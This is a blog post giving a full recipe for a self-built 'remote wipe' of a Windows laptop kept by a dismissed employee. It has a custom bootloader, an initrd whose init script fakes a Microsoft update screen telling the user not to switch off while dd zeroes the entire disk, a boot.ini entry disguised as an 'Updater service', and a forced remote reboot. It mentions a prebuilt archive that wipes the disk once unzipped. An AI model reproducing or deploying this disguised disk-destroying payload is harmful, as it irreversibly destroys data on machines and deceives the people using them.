I've recently had this situation where an employee was fired, and then refused to return 'his' laptop to the company. I cannot break into his home to return the hardware. But at least, I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.
How to do a remote wipe of a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Don't ever do vandalism, just use this to protect your data from thieves.
Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping this in the c:\ of your computer will wipe the harddisk.
Social solution for technical limitations
The bootsector of a harddrive is overwritten in a jiffy. But this can easily be restored with special tools. If you overwrite the whole harddisk, the data cannot be restored. But overwriting takes a lot of time.
If you're telling the thief "hey, i'm now overwriting the harddisk", he'll probably switch it off. So we need to scare the thief into not turning of the computer. I did this by printing a text "microsoft update being installed" and saying that the user should absolutely not switch off the computer.
To build the software for a remote wipe, you need:
- Administrator access to the stolen laptop
- A virtual machine (like VMWare) to test it. An identical laptop would even be better, 'cause it has the exact same drivers.
Step 1. Build grub bootloader
You can build your own bootloader or use my grldr. Compiling on my x86_64 didn't work, use a 32 bit system (or fix the libs yourself)!
chmod +x configure build
//edit line 298 and 960 and to scare the laptop thief into not switching off the computer.
In grub4dos-temp/grub4dos-0.4.4/ you'll find a file grldr. This is the grub bootloader. Copy it to the c:\ of the computer you want to wipe.
Step 2. Get yourself a linux kernel
I simply used the running CentOS kernel of my development machine, named /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to the c:\ of the "victim".
Step 3. Make a initrd
With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. Thats why we put all tools in a initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, which is /boot/initrd-2.6.18-194.26.1.el5.img
cat /boot/initrd-2.6.18-194.26.1.el5.img | gzip -d | cpio -id
#Download a statically linked "dd" executable. (Or build it yourself)
unzip dd.zip && rm dd.zip
Now edit the file "init" to load all required drivers, make /dev nodes and finally wipe the system. My init file contains:
# here I have 40 more echo's, like a "tput clear" without having the tput command
echo "Microsoft(TM) Windows(TM) is applying updates."
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
#insmod /lib/sata_via.ko #or other drivers
dd if=/dev/zero of=/dev/?da #either sda or hda
Warning: You may need drivers to access the harddisk, for instance ahci.ko. Check the "victims" chipset and load the correct drivers.
Finally, merge the files to 1 initrd file: find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz and copy it to c:\ of the "victim".
Step 4: menu.lst
Create a file named menu.lst and place it in c:\
title Installing update
kernel (hd0,0)/bzImage quiet
Step 5: boot.ini
The hidden system file c:\boot.ini contains information for the ntldr bootloader windows uses. Remove the system and hidden attributes. Then edit boot.ini to contain the following information:
c:\grldr="MSWIN Updater service"
Step 6: Check
The c:\ of the "victim" now contains:
Check that all files exist.
Step 7: Reboot
With psshutdown (part of microsoft's pstools) reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer, he may not reboot it but suspend instead.© GeekLabInfo Remote wipe for Windows clients is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info